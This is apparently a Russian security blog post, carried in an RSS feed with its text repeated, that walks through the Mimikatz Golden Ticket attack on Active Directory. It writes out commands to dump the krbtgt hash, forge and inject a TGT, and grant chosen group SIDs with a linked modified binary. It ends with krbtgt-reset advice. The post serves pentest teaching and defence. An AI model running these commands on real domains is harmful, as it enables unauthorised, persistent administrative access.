Второе условие выполняется при наличии минимального доступа к домену. SID-домена можно получить, например, как предлагает автор &lt;a href="http://rycon.hu/papers/goldenticket.html" target="_blank"&gt;одноименной публикации&lt;/a&gt;, через whoami или &lt;a href="http://technet.microsoft.com/en-us/sysinternals/bb897417.aspx" target="_blank"&gt;PsGetsid&lt;/a&gt; из состава &lt;a href="http://technet.microsoft.com/ru-ru/sysinternals/bb545021.aspx" target="_blank"&gt;Sysinternals&lt;/a&gt;:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBgh5sBoqsPw7dkQ6iXsCJ5Y7tV3RRzugtdaMccaigbRXmsJnZbIZo45z_63hJVb7mdcpM9gNTcJ7E0ooFXCynICLeV9_07q0FTIXRhB-0Hy6FUDz2NtvL4N7kj3w_bR-9UmoG2Ng2gb0/s3200/Mimikatz-Golden-Ticket_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBgh5sBoqsPw7dkQ6iXsCJ5Y7tV3RRzugtdaMccaigbRXmsJnZbIZo45z_63hJVb7mdcpM9gNTcJ7E0ooFXCynICLeV9_07q0FTIXRhB-0Hy6FUDz2NtvL4N7kj3w_bR-9UmoG2Ng2gb0/s3200/Mimikatz-Golden-Ticket_2.png" height="318" width="500" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Последнее условие необходимо только в момент использования шитых мимакадзом привилегий. Генерация самого TGT билета может протекать где угодно.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;mimikatz.exe "kerberos::golden /admin:ANYID /domain:TEST.LOCAL /sid:S-1-5-21-3838653977-3010990090-570996099 /krbtgt:C1E209654807223D8CB17376FCB70E53 /ticket:myfile" exit&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioYyEiqyg1QmL1v9TmrMszRrjkERWlZd193Zuhxmx4Atp5Gl1tnzl8TL-abeHfDkA_GUuZaHZ-juSEnwCu2IDreeivSVdzGqmRNAGNGcbMpp3rWejsabveBxfDEN7vIwaz_vZQsEZvQvY/s3200/Mimikatz-Golden-Ticket_3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioYyEiqyg1QmL1v9TmrMszRrjkERWlZd193Zuhxmx4Atp5Gl1tnzl8TL-abeHfDkA_GUuZaHZ-juSEnwCu2IDreeivSVdzGqmRNAGNGcbMpp3rWejsabveBxfDEN7vIwaz_vZQsEZvQvY/s3200/Mimikatz-Golden-Ticket_3.png" height="365" width="500" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
kerberos::golden – вызов функции генерации TGT билета&lt;br /&gt;
/admin:ANYID – сюда можно писать произвольный идентификатор (будет светиться в журнале безопасности)&lt;br /&gt;
&amp;nbsp;/domain:TEST.LOCAL – целевой домен&lt;br /&gt;
&amp;nbsp;/sid:S-1-5-21-3838653977-3010990090-570996099 – идентификатор целевого домена&lt;br /&gt;
/krbtgt:C1E209654807223D8CB17376FCB70E53 – NTLM-хеш пользователя krbtgt&lt;br /&gt;
/ticket:myfile – имя файла, в который будет записан новоиспеченный TGT билет&lt;br /&gt;
&lt;br /&gt;
После генерации этого файла возвращаемся к доменному компьютеру и подгружаем волшебный "золотой билетик" Kerberos:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;mimikatz.exe "kerberos::ptt myfile" exit&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiv-WS_uK245arJgj5_z5V1UwAOi1coFmJgpZwDoJZDPMZ-tRCjPkyKtCyK46wZDt_l82kHK-KfgKHuruVJYquIirKan04VDLGJsxNNu5-8fgxuZmCGt6tG4e00opJLfvK32q5mh-xOmhU/s3200/Mimikatz-Golden-Ticket_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiv-WS_uK245arJgj5_z5V1UwAOi1coFmJgpZwDoJZDPMZ-tRCjPkyKtCyK46wZDt_l82kHK-KfgKHuruVJYquIirKan04VDLGJsxNNu5-8fgxuZmCGt6tG4e00opJLfvK32q5mh-xOmhU/s3200/Mimikatz-Golden-Ticket_4.png" height="381" width="500" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgN25zPo4vyuPgGjNSiySBNmDcAY29yCn7Ou5DBn5yCtKpyV37iw6iScp0w0JHj0ttZ3jeH1QKvIL9UCuOPtwar19j6x48HbSrBCli2cMbvzzl3rHfoZ_KeAmFCnU4gMcKmFvoGO2hYcfs/s3200/Mimikatz-Golden-Ticket_5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgN25zPo4vyuPgGjNSiySBNmDcAY29yCn7Ou5DBn5yCtKpyV37iw6iScp0w0JHj0ttZ3jeH1QKvIL9UCuOPtwar19j6x48HbSrBCli2cMbvzzl3rHfoZ_KeAmFCnU4gMcKmFvoGO2hYcfs/s3200/Mimikatz-Golden-Ticket_5.png" height="342" width="500" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiI119TOG-Bu3qHPYG83ZQitBYh4AwY7USm49jC_DctFF1PVMRtFw1vDtsB4dbdlO-v-2QNXJp0NuaXo2OYuWZNEgWc6khYSsnrgSSEfi1JyHmXNxVOwJDsKdUJm4cxcwqUvw0d2iK-Qws/s3200/Mimikatz-Golden-Ticket_6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiI119TOG-Bu3qHPYG83ZQitBYh4AwY7USm49jC_DctFF1PVMRtFw1vDtsB4dbdlO-v-2QNXJp0NuaXo2OYuWZNEgWc6khYSsnrgSSEfi1JyHmXNxVOwJDsKdUJm4cxcwqUvw0d2iK-Qws/s3200/Mimikatz-Golden-Ticket_6.png" height="347" width="500" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic6ONmTASTLF5aLCNJQylrwBwtqU7Br1la2MI3pNOXx96ariTI9FpWCpWiNSb7b_ltacVplcPv2sIdmv7ZfvgwseL47PdEoClGZI8DHzRMuq0jTvmgbMMHL8mX6u5Pp3DIBq0ia6d8PMs/s3200/Mimikatz-Golden-Ticket_7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic6ONmTASTLF5aLCNJQylrwBwtqU7Br1la2MI3pNOXx96ariTI9FpWCpWiNSb7b_ltacVplcPv2sIdmv7ZfvgwseL47PdEoClGZI8DHzRMuq0jTvmgbMMHL8mX6u5Pp3DIBq0ia6d8PMs/s3200/Mimikatz-Golden-Ticket_7.png" height="291" width="500" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvGLLIfiRuQnj7hXfU-EBPeo2czxz_SdRteus5HQDN2pIjGuaJiTlYPmRHjU62gJQC-X7Xus8TgRMwrRKMD3z41QKaBVma08ZwBbPVo1IeIZosGiyfJLBqHJGjdGt6uYrS7auWbogL0bU/s3200/Mimikatz-Golden-Ticket_8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvGLLIfiRuQnj7hXfU-EBPeo2czxz_SdRteus5HQDN2pIjGuaJiTlYPmRHjU62gJQC-X7Xus8TgRMwrRKMD3z41QKaBVma08ZwBbPVo1IeIZosGiyfJLBqHJGjdGt6uYrS7auWbogL0bU/s3200/Mimikatz-Golden-Ticket_8.png" height="447" width="500" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Ну и не стоит забывать, что аутентификация по протоколу Kerberos завязана на использование полных DNS-имен, поэтому голые ip-адреса придется забыть.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjb9b7KwEn479c8WeahKB60LbhSah1eHERma4bu2TRodsBKJ2tkRuRKBZUJDUzyVZ3pW-oWQUAEw8M1dywbM0Tnvhh1EfZTGxDI9_dMH3qS7idCQw0KGN9LhlzijckVcu06w0nu7-UajD8/s3200/Mimikatz-Golden-Ticket_9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjb9b7KwEn479c8WeahKB60LbhSah1eHERma4bu2TRodsBKJ2tkRuRKBZUJDUzyVZ3pW-oWQUAEw8M1dywbM0Tnvhh1EfZTGxDI9_dMH3qS7idCQw0KGN9LhlzijckVcu06w0nu7-UajD8/s3200/Mimikatz-Golden-Ticket_9.png" height="400" width="570" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
В готовой сборке Mimikatz владелец золотого TGT билета становится участником следующих групп безопасности:&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;SID 512 - Администраторы домена&lt;/li&gt;
&lt;li&gt;SID 513 - Пользователи домена&lt;/li&gt;
&lt;li&gt;SID 518 - Администраторы схемы&lt;/li&gt;
&lt;li&gt;SID 519 - Администраторы предприятия&lt;/li&gt;
&lt;li&gt;SID 520 - Владельцы-создатели групповой политики&lt;/li&gt;
&lt;/ul&gt;
, а также получает маркер доступа встроенной учетной записи администратора системы (SID 500). К сожалению, в реальной жизни этого не всегда хватает. Например, для случаев, когда необходимо аккуратно тыкнуться на определенный ресурс (например, на файловый сервер) без внесения каких-либо изменений в систему. Да-да, смена владельца с последующим сбросом ACL (и последующим ее восстановлением) на киллограмовой папочке только для того, чтобы убедиться в отсутствии файликов с паролями в плейн тексте, изрядно напрягает.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8RlcLrG-ITdjb3tqbnwpAQCphIrD6E2flpDn_LRm_NZ3ssQg0XaXsNY_q8yI54cyx9v3e8BWUcQ8MpFgv4A1nnVrW8fCpWaa_WzujpYwN5EQ_3Uos1bQQdLUL_Q8uFIsEkMNfkFisIh0/s3200/Mimikatz-Golden-Ticket_10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8RlcLrG-ITdjb3tqbnwpAQCphIrD6E2flpDn_LRm_NZ3ssQg0XaXsNY_q8yI54cyx9v3e8BWUcQ8MpFgv4A1nnVrW8fCpWaa_WzujpYwN5EQ_3Uos1bQQdLUL_Q8uFIsEkMNfkFisIh0/s3200/Mimikatz-Golden-Ticket_10.png" height="363" width="530" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
В подобных случаях можно собрать свою версию Mimikatz (благо &lt;a href="https://code.google.com/p/mimikatz/source/checkout" target="_blank"&gt;имеются сорцы&lt;/a&gt;&amp;nbsp;в свободном доступе с подробным &lt;a href="https://code.google.com/p/mimikatz/" target="_blank"&gt;руководством&lt;/a&gt; по сборке). Самые же ленивые могут забрать готовую дополненную версию в части генерации TGT билета&amp;nbsp;&lt;a href="https://docs.google.com/file/d/0Bwv6HYj6-f9tdlFkYmdDNUY4c3c/edit?pli=1" target="_blank"&gt;отсюда&lt;/a&gt; (mimi.exe/md5 324ac76502379a869485f7a404dd1570). В ней появились два новых параметра:&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;/usersid – собсно SID пользователя&lt;/li&gt;
&lt;li&gt;/groupsid – участником какой группы необходимо быть (помимо администраторов домена, предприятий и пр.)&lt;/li&gt;
&lt;/ul&gt;
Предположим мы хотим получить доступ к каталогу "only_test01", как показано на рисунке выше. Для этого заглядываем в список контроля доступа удаленного ресурса (eq &lt;a href="http://technet.microsoft.com/ru-ru/sysinternals/bb897442.aspx" target="_blank"&gt;ShareEnum&lt;/a&gt;), получаем SID целевой группы (eq &lt;a href="http://technet.microsoft.com/en-us/sysinternals/bb897417.aspx" target="_blank"&gt;PsGetsid&lt;/a&gt;) и создаем себе условия легитимного доступа:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;mimi.exe "kerberos::golden /admin:ANONYMOUS /domain:TEST.LOCAL /sid:S-1-5-21-3838653977-3010990090-570996099 /krbtgt:C1E209654807223D8CB17376FCB70E53 /ticket:myfile2 /usersid:501 /groupsid:1120" exit&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;mimi.exe "kerberos::ptt myfile2" exit&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
И вуаля!11&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQ03zChHTZZC0hkbGFiZJNcxFDv_sipFX_y5cUc-ymJOGpHN8N9xiDbLxqP6A1w9fe-PdLzm_Blm48b0C9y354jGudNVW-v2GXcxnCsxMNHv9yEKGZmLE9IO9o8gxWm5uYYxQWQFn0MJU/s3200/Mimikatz-Golden-Ticket_11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQ03zChHTZZC0hkbGFiZJNcxFDv_sipFX_y5cUc-ymJOGpHN8N9xiDbLxqP6A1w9fe-PdLzm_Blm48b0C9y354jGudNVW-v2GXcxnCsxMNHv9yEKGZmLE9IO9o8gxWm5uYYxQWQFn0MJU/s3200/Mimikatz-Golden-Ticket_11.png" height="680" width="556" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUcgb-0kQ19zq_o8iuTa0iy5V0-JmYNlLlvRyvjP81Kvy8yJweCJ5OdD5zAp1-WkQDgnhL6qgQsxlJY8Qi4LGZV4G1cWeMF5WT4XRGhmsBQFW763jbPhGSSr4B3w80WmqAdFQX21hA01k/s3200/Mimikatz-Golden-Ticket_12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUcgb-0kQ19zq_o8iuTa0iy5V0-JmYNlLlvRyvjP81Kvy8yJweCJ5OdD5zAp1-WkQDgnhL6qgQsxlJY8Qi4LGZV4G1cWeMF5WT4XRGhmsBQFW763jbPhGSSr4B3w80WmqAdFQX21hA01k/s3200/Mimikatz-Golden-Ticket_12.png" height="445" width="560" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;Как защититься?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Согласитесь, с точки зрения форенсики забавная штука получается :)) Отмониторить активность атакующего, суметь отделить ее от активности настоящих легитимных пользователей и сервисных учетных записей при подобных возможностях, будет ох как непросто, если вообще возможно. &amp;nbsp;А вот предотвратить (повторный) несанкционированный доступ можно путем смены пароля пользователю krbtgt. Причем &lt;b&gt;менять пароль необходимо два раза подряд&lt;/b&gt; (еще одна &lt;a href="http://technet.microsoft.com/en-us/library/8e3e4377-ef54-4a70-9215-a5d2ba4d0eb9(v=ws.10)#BKMK_Resetkrbtgt" target="_blank"&gt;тонкая особенность&lt;/a&gt;&amp;nbsp;krbtgt), затем передергивать службу KDC и наблюдать как (временно или насовсем) отваливаются сервисы, завязанные на Active Directory… итак до следующего случая компрометации хешика krbtgt :) Удачи!&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7dOrlzs65WqvSSYHm0uJPwt41Heea_AtMKPcZFOCLNdXzUBLtufCa59uB27Ke-E8nK17Ufq0YfzfeNDhiC1WmZBwJxxDIWd5cXKmmH0Cm13TiR-xWEsqRNAcz6TQ3HgsBqGvSrjcYbMk/s72-c/KerberosFULL.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">10</thr:total><enclosure length="350558" type="application/pdf" url="http://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-whitepaper.pdf"/><itunes:explicit>no</itunes:explicit><itunes:subtitle>В начале этого года Benjamin Delpy aka gentilkiwi вновь порадовал сообщество очередным исследованием и, как следствие, новым функционалом в своей эпической сборке под названием Mimikatz. Речь идет про использование архитектурных особенностей службы Kerberos в Microsoft Active Directory с целью скрытого сохранения привилегированного доступа над ресурсами домена. Чтобы понять всю ценность раскопок gentilkiwi, стоит освежить свои знания в контексте протокола Kerberos и о его месте в службе каталогов Microsoft. Что мы помним про Kerberos? Из сухой теории по безопасности припоминается, что это какой-то сетевой протокол аутентификации, изначально спроектированный в недрах Массачусетского универа… это что-то болтающееся на контроллерах домена в виде открытого порта 88 и предназначенное для прозрачной авторизации к ресурсам домена. Это "нечто муторное", делающее жизнь администратора сети радостной и беззаботной... (картинка дернута со страницы википедии) &amp;lt;!-- Я не стану очередным писакой, подробно разжевывающим внутреннее устройство протокола Kerberos. За меня это уже сделали 100500 раз и куда более грамотные люди. Заполнить пробелы по работе Kerberos можно, например, на страницах TechNet. --&amp;gt; Не залезая в дебри протокола, грубо говоря аутентификация в стиле Kerberos базируется на "билетах доступа". Для получения доступа к ресурсу клиент предоставляет свой билет доступа, а ресурс в свою очередь, на основе криптографической магии, верифицирует этот билет доступа и принимает решение, какими правами наделен клиент и наделен-ли он ими вообще. Особую роль во всем этом процессе занимают сервера аутентификации, которые отвечают за выдачу сакральных билетов доступа. В Microsoft Active Directory эту функцию выполняют контроллеры домена. Начиная с Kerberos четвертой версии появляется такая полезная штука, как TGT (Ticket Granting Ticket — билет для получения билета). Именно эту версию протокола Kerberos штампует корпорация добра в свое решение для централизованного управления сетями, которое впоследствии получает название Microsoft Active Directory. С первого взгляда все просто замечательно! Разве что повылезали косяки в реализации… Хотя у кого их не было? [тынц] Сейчас разумеется подобные баги пофикшены и сурьезные компании, которые срослись всеми частями своей ИТ-инфраструктуры с MS AD, могут вздохнуть с облегчением, но… Копнем несколько глубже в устройство Майкрософт Kerberos и окажется, что вся пирамида с билетами доступа строится на основе одного пользователя – krbtgt, а еще точнее, вся криптомагия с билетами завязана на NTLM-хеш этого пользователя. То есть, счастливый обладатель правильной 32-х битной последовательностью символов получает безграничные привилегии ко всем имеющимся в домене ресурсам т.к. способен выписывать билеты Kerberos с любым уровнем доступа. И это не является уязвимостью! Так устроен протокол аутентификации Kerberos. А теперь задумаемся, как часто этот основополагающий "секрет" (пароль пользователя krbtgt) меняют? Смешно, но ни у одной известной мне компании в регламентах по безопасности не встречается упоминания про смену пароля пользователю krbtgt. То есть, самый важный "ключ" к Active Directory, с помощью которого происходит отруливание всей авторизацией к информационным ресурсам предприятия создается единожды (при создании нового домена) и не меняется на протяжении всего времени его существования. На это собственно и обратил внимание gentilkiwi, что побудило его запилить новый функционал в Mimikatz. Так появилась функция генерации условно бессрочного TGT билета, выписанного на идентификатор встроенного администратора системы (SID 500). Прелесть этого TGT билета в том, что даже при условии, когда используемая учетная запись будет заблокирована или отключена, аутентификация по Kerberos будет работать! Отсутствие возможности использовать дополнительных условий ограничения доступа в отношении встроенной учетной записи администратора с SID 500 такие, например, как ограничение доступа по времени, открывают отличные перспективы для атакующего. Кроме того, для подгрузки TGT билета в адресное пространство операционной системы не требуется высоких привилегий администратора или системы, достаточно обычных прав доменного пользователя. Для создания волшебного билета Kerberos, открывающего все двери к ресурсам домена, потребуется увести используемый NTLM-хеш пользователя krbtgt. «Трудно быть Богом, но кто-то же должен им быть…» (с) Итак, для полной концепции Бога в адешечке нам понадобится: NTLM-хеш пользователя krbtgt Имя-домена и его SID Компутер под управлением Windows, являющийся участником целевого домена Для выполнения первого условия необходимо либо наличие актуальной резервной копии Active Directory, либо соответствующие права в домене, позволяющие сделать такую копию [ссылка]. Как вариант это можно провернуть с использованием того-же Mimikatz: mimikatz.exe "privilege::debug" "lsadump::samrpc /patch" exit &amp;lt;!-- К пробегающим сейчас мыслям у воодушевленного читателя о возможном бруте пароля пользователя krbtgt. Сделать этого не получится, т.к. за его безопасность отвечает харкоженная в AD функция, которая срабатывает при любой операции с паролем этого пользователя, генерирует случайную последовательность из 16-ти символов юникод и устанавливает ее в качестве нового пароля. То есть, если вы попытаетесь сбросить пароль пользователю krbtgt, скажем на "123", то будьте уверены, что адешечка подсунет ему свой секурный пароль, не допустив тем самым порождения очередной дырки. --&amp;gt; Второе условие выполняется при наличии минимального доступа к домену. SID-домена можно получить, например, как предлагает автор одноименной публикации, через whoami или PsGetsid из состава Sysinternals: Последнее условие необходимо только в момент использования шитых мимакадзом привилегий. Генерация самого TGT билета может протекать где угодно. mimikatz.exe "kerberos::golden /admin:ANYID /domain:TEST.LOCAL /sid:S-1-5-21-3838653977-3010990090-570996099 /krbtgt:C1E209654807223D8CB17376FCB70E53 /ticket:myfile" exit kerberos::golden – вызов функции генерации TGT билета /admin:ANYID – сюда можно писать произвольный идентификатор (будет светиться в журнале безопасности) &amp;nbsp;/domain:TEST.LOCAL – целевой домен &amp;nbsp;/sid:S-1-5-21-3838653977-3010990090-570996099 – идентификатор целевого домена /krbtgt:C1E209654807223D8CB17376FCB70E53 – NTLM-хеш пользователя krbtgt /ticket:myfile – имя файла, в который будет записан новоиспеченный TGT билет После генерации этого файла возвращаемся к доменному компьютеру и подгружаем волшебный "золотой билетик" Kerberos: mimikatz.exe "kerberos::ptt myfile" exit Ну и не стоит забывать, что аутентификация по протоколу Kerberos завязана на использование полных DNS-имен, поэтому голые ip-адреса придется забыть. В готовой сборке Mimikatz владелец золотого TGT билета становится участником следующих групп безопасности: SID 512 - Администраторы домена SID 513 - Пользователи домена SID 518 - Администраторы схемы SID 519 - Администраторы предприятия SID 520 - Владельцы-создатели групповой политики , а также получает маркер доступа встроенной учетной записи администратора системы (SID 500). К сожалению, в реальной жизни этого не всегда хватает. Например, для случаев, когда необходимо аккуратно тыкнуться на определенный ресурс (например, на файловый сервер) без внесения каких-либо изменений в систему. Да-да, смена владельца с последующим сбросом ACL (и последующим ее восстановлением) на киллограмовой папочке только для того, чтобы убедиться в отсутствии файликов с паролями в плейн тексте, изрядно напрягает. В подобных случаях можно собрать свою версию Mimikatz (благо имеются сорцы&amp;nbsp;в свободном доступе с подробным руководством по сборке). Самые же ленивые могут забрать готовую дополненную версию в части генерации TGT билета&amp;nbsp;отсюда (mimi.exe/md5 324ac76502379a869485f7a404dd1570). В ней появились два новых параметра: /usersid – собсно SID пользователя /groupsid – участником какой группы необходимо быть (помимо администраторов домена, предприятий и пр.) Предположим мы хотим получить доступ к каталогу "only_test01", как показано на рисунке выше. Для этого заглядываем в список контроля доступа удаленного ресурса (eq ShareEnum), получаем SID целевой группы (eq PsGetsid) и создаем себе условия легитимного доступа: mimi.exe "kerberos::golden /admin:ANONYMOUS /domain:TEST.LOCAL /sid:S-1-5-21-3838653977-3010990090-570996099 /krbtgt:C1E209654807223D8CB17376FCB70E53 /ticket:myfile2 /usersid:501 /groupsid:1120" exit mimi.exe "kerberos::ptt myfile2" exit И вуаля!11 Как защититься? Согласитесь, с точки зрения форенсики забавная штука получается :)) Отмониторить активность атакующего, суметь отделить ее от активности настоящих легитимных пользователей и сервисных учетных записей при подобных возможностях, будет ох как непросто, если вообще возможно. &amp;nbsp;А вот предотвратить (повторный) несанкционированный доступ можно путем смены пароля пользователю krbtgt. Причем менять пароль необходимо два раза подряд (еще одна тонкая особенность&amp;nbsp;krbtgt), затем передергивать службу KDC и наблюдать как (временно или насовсем) отваливаются сервисы, завязанные на Active Directory… итак до следующего случая компрометации хешика krbtgt :) Удачи!</itunes:subtitle><itunes:author>noreply@blogger.com (Dmitry Evteev)</itunes:author><itunes:summary>В начале этого года Benjamin Delpy aka gentilkiwi вновь порадовал сообщество очередным исследованием и, как следствие, новым функционалом в своей эпической сборке под названием Mimikatz. Речь идет про использование архитектурных особенностей службы Kerberos в Microsoft Active Directory с целью скрытого сохранения привилегированного доступа над ресурсами домена. Чтобы понять всю ценность раскопок gentilkiwi, стоит освежить свои знания в контексте протокола Kerberos и о его месте в службе каталогов Microsoft. Что мы помним про Kerberos? Из сухой теории по безопасности припоминается, что это какой-то сетевой протокол аутентификации, изначально спроектированный в недрах Массачусетского универа… это что-то болтающееся на контроллерах домена в виде открытого порта 88 и предназначенное для прозрачной авторизации к ресурсам домена. Это "нечто муторное", делающее жизнь администратора сети радостной и беззаботной... (картинка дернута со страницы википедии) &amp;lt;!-- Я не стану очередным писакой, подробно разжевывающим внутреннее устройство протокола Kerberos. За меня это уже сделали 100500 раз и куда более грамотные люди. Заполнить пробелы по работе Kerberos можно, например, на страницах TechNet. --&amp;gt; Не залезая в дебри протокола, грубо говоря аутентификация в стиле Kerberos базируется на "билетах доступа". Для получения доступа к ресурсу клиент предоставляет свой билет доступа, а ресурс в свою очередь, на основе криптографической магии, верифицирует этот билет доступа и принимает решение, какими правами наделен клиент и наделен-ли он ими вообще. Особую роль во всем этом процессе занимают сервера аутентификации, которые отвечают за выдачу сакральных билетов доступа. В Microsoft Active Directory эту функцию выполняют контроллеры домена. Начиная с Kerberos четвертой версии появляется такая полезная штука, как TGT (Ticket Granting Ticket — билет для получения билета). Именно эту версию протокола Kerberos штампует корпорация добра в свое решение для централизованного управления сетями, которое впоследствии получает название Microsoft Active Directory. С первого взгляда все просто замечательно! Разве что повылезали косяки в реализации… Хотя у кого их не было? [тынц] Сейчас разумеется подобные баги пофикшены и сурьезные компании, которые срослись всеми частями своей ИТ-инфраструктуры с MS AD, могут вздохнуть с облегчением, но… Копнем несколько глубже в устройство Майкрософт Kerberos и окажется, что вся пирамида с билетами доступа строится на основе одного пользователя – krbtgt, а еще точнее, вся криптомагия с билетами завязана на NTLM-хеш этого пользователя. То есть, счастливый обладатель правильной 32-х битной последовательностью символов получает безграничные привилегии ко всем имеющимся в домене ресурсам т.к. способен выписывать билеты Kerberos с любым уровнем доступа. И это не является уязвимостью! Так устроен протокол аутентификации Kerberos. А теперь задумаемся, как часто этот основополагающий "секрет" (пароль пользователя krbtgt) меняют? Смешно, но ни у одной известной мне компании в регламентах по безопасности не встречается упоминания про смену пароля пользователю krbtgt. То есть, самый важный "ключ" к Active Directory, с помощью которого происходит отруливание всей авторизацией к информационным ресурсам предприятия создается единожды (при создании нового домена) и не меняется на протяжении всего времени его существования. На это собственно и обратил внимание gentilkiwi, что побудило его запилить новый функционал в Mimikatz. Так появилась функция генерации условно бессрочного TGT билета, выписанного на идентификатор встроенного администратора системы (SID 500). Прелесть этого TGT билета в том, что даже при условии, когда используемая учетная запись будет заблокирована или отключена, аутентификация по Kerberos будет работать! Отсутствие возможности использовать дополнительных условий ограничения доступа в отношении встроенной учетной записи администратора с SID 500 такие, например, как ограничение доступа по времени, открывают отличные перспективы для атакующего. Кроме того, для подгрузки TGT билета в адресное пространство операционной системы не требуется высоких привилегий администратора или системы, достаточно обычных прав доменного пользователя. Для создания волшебного билета Kerberos, открывающего все двери к ресурсам домена, потребуется увести используемый NTLM-хеш пользователя krbtgt. «Трудно быть Богом, но кто-то же должен им быть…» (с) Итак, для полной концепции Бога в адешечке нам понадобится: NTLM-хеш пользователя krbtgt Имя-домена и его SID Компутер под управлением Windows, являющийся участником целевого домена Для выполнения первого условия необходимо либо наличие актуальной резервной копии Active Directory, либо соответствующие права в домене, позволяющие сделать такую копию [ссылка]. Как вариант это можно провернуть с использованием того-же Mimikatz: mimikatz.exe "privilege::debug" "lsadump::samrpc /patch" exit &amp;lt;!-- К пробегающим сейчас мыслям у воодушевленного читателя о возможном бруте пароля пользователя krbtgt. Сделать этого не получится, т.к. за его безопасность отвечает харкоженная в AD функция, которая срабатывает при любой операции с паролем этого пользователя, генерирует случайную последовательность из 16-ти символов юникод и устанавливает ее в качестве нового пароля. То есть, если вы попытаетесь сбросить пароль пользователю krbtgt, скажем на "123", то будьте уверены, что адешечка подсунет ему свой секурный пароль, не допустив тем самым порождения очередной дырки. --&amp;gt; Второе условие выполняется при наличии минимального доступа к домену. SID-домена можно получить, например, как предлагает автор одноименной публикации, через whoami или PsGetsid из состава Sysinternals: Последнее условие необходимо только в момент использования шитых мимакадзом привилегий. Генерация самого TGT билета может протекать где угодно. mimikatz.exe 